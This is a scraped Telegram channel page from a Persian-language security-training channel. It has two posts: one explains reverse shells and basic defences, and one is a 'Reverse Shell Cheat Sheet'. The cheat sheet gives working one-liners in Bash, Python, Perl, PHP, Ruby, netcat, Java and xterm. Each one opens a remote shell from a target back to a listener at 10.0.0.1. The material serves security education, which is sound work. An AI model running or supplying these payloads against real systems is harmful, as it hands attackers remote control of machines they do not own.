Security hint
4.53K subscribers
75 photos
2 videos
18 files
187 links
🔥Security training

🎯 قراره روشن کننده مسیرتون باشیم.

یوتیوب: www.youtube.com/@sec_hint

اپارات: aparat.com/sec_hint

گیت‌هاب: https://github.com/sechint

ادمین:
@adm_sec_hint
Download Telegram
🦎Reverse Shell
شل معکوس نوعی شل هست که اتصال رو به صورت معکوس برقرار میکنه. به این معنی که به جای اینکه شما به سرور متصل بشید، سرور هدف به سیستم عامل شما متصل میشه تا کنترل کاملی بر سیستم هدف داشته باشید.

نحوه عملکرد شل معکوس:

ایجاد شنودگر: مهاجم یک شنودگر (listener) در سیستم خود راه اندازی می کند. این شنودگر منتظر اتصال از طرف سرور هدف می ماند.
اجرای کد مخرب: مهاجم یک کد مخرب را در سیستم هدف اجرا می کند. این کد می تواند به صورت یک فایل پیوست، یک اسکریپت یا یک بدافزار باشد.
برقراری اتصال: کد مخرب به شنودگر مهاجم متصل می شود و یک تونل (tunnel) ارتباطی ایجاد می کند.
دسترسی از راه دور: مهاجم از طریق تونل ایجاد شده می تواند دستورات را در سیستم هدف اجرا کند و به طور کامل آن را کنترل کند.

مقابله با شل معکوس:

نصب فایروال: فایروال میتونه از ورود ترافیک غیرمجاز به سیستم و برقراری اتصال شل معکوس جلوگیری کنه.
نصب آنتی ویروس: آنتی ویروس میتونه کدهای مخرب رو که میتونن برای ایجاد شل معکوس استفاده بشن، شناسایی و مسدود کنه.
به روز رسانی نرم افزار: به روز رسانی منظم سیستم عامل و نرم افزارها میتونه از آسیب پذیری هایی که هکرها میتونن از اونها برای سوء استفاده از شل های معکوس استفاده کنن، جلوگیری کنه.
آموزش کاربران: آموزش کاربران در مورد خطرات شل های معکوس و نحوه شناسایی و جلوگیری از اونها میتونه به افزایش امنیت سیستم ها کمک کنه.

#shell #Reverse_Shell
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐@Sec_Hint & 😘 Boost
👍52🤩2
Security hint
👻👻👻👻👻👻👻 براتون اینجا گذاشتم https://youtu.be/B7Sn709pLVE 😉😉😉
👑Reverse Shell Cheat Sheet

Bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


PERL:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


PHP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Netcat:
nc -e /bin/sh 10.0.0.1 1234


Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


xterm:
xterm -display 10.0.0.1:1


#Reverse_Shell #Cheat_Sheet

ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
6👍3👻1